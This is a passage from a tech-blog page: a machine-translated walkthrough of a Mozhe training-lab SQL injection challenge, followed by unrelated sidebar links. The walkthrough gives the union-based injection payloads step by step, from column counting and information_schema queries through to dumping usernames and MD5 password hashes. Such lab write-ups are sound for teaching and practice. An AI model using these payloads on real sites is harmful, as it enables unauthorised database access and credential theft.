当前位置:网站首页>Mozi college SQL injection solution
Mozi college SQL injection solution
2020-11-08 09:40:00 【osc_7bgz0no1】
One · Judgment injection
Input id=1, Normal return . Input id=-1 Returns an error . from This shows that there is injection .
Two · Judgment fields
URL id=-1 order by 1
URL id=-1 order by 2
URL id=-1 order by 3
URL id=-1 order by 4
URL id=-1 order by 5 An error at this time , The description has four fields
3、 ... and · Use union Query injection point
Input union select 1,2,3,4
Find out 2,3 For the obvious note point
Four · Use database() Chaku name
Input union select 1,database(),3,4
Find out the name of the library mozhe_Discuz_StormGroup
5、 ... and · Look up the name of the table
Input
union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’
Query to StormGroup_member,notice
See member, So doubt about the first one . So first look up the first .
6、 ... and · Inquire about StormGroup_member The fields stored in the
Input
union select 1,group_concat(column_name)3,4 from information_schema.columns where table_name=‘StormGroup_member’
Query out id,name,password,status
7、 ... and · Query password and user name
union select 1,group_concat(name,0x3a,password),3,4 from StormGroup_member
obtain md5 Encrypted value . To decrypt , Get the code .
If the password is wrong , adopt limit m,n To continue with the inquiry .
8、 ... and · Submit key
After getting the password, you can see key, Copy , Submit .
版权声明
本文为[osc_7bgz0no1]所创,转载请带上原文链接,感谢
边栏推荐
猜你喜欢
Simple use of future in Scala
C++在C的基础上改进了哪些细节
python 循环区分(while循环和for循环)
ASP.NET MVC下基于异常处理的完整解决方案
个人短网址生成平台 自定义域名、开启防红、统计访问量
Rust:命令行参数与环境变量操作
麦格理银行借助DataStax Enterprise (DSE) 驱动数字化转型
函数周期表丨筛选丨值丨SELECTEDVALUE - 知乎
ts流中的pcr与pts计算与逆运算
Mate 40 series launch with Huawei sports health service to bring healthy digital life
随机推荐
What details does C + + improve on the basis of C
Tiktok live monitoring Api: random recommendation
Do you really understand the high concurrency?
比Python快20%,就问你兴不兴奋?
蓝牙2.4G产品日本MIC认证的测试要求
Swiper window width changes, page width height changes lead to automatic sliding solution
架构师(2020年11月)
Unparseable date: 'mon Aug 15 11:24:39 CST 2016', time format conversion exception
ArrayList源码分析
Px4 adds new applications
接口
Astra: Apache Cassandra的未来是云原生
Architect (November 2020)
Is there a big difference between i5 1135g7 and i51035g1? Which is better?
Face recognition: attack types and anti spoofing techniques
ts流中的pcr与pts计算与逆运算
Wechat nickname Emoji expression, special expression causes the list not to be displayed, export excel error report and other problems solved!
Recommend an economic science video, very valuable!
“智能5G”引领世界,数位智能网优+5G能带来什么?
Japan PSE certification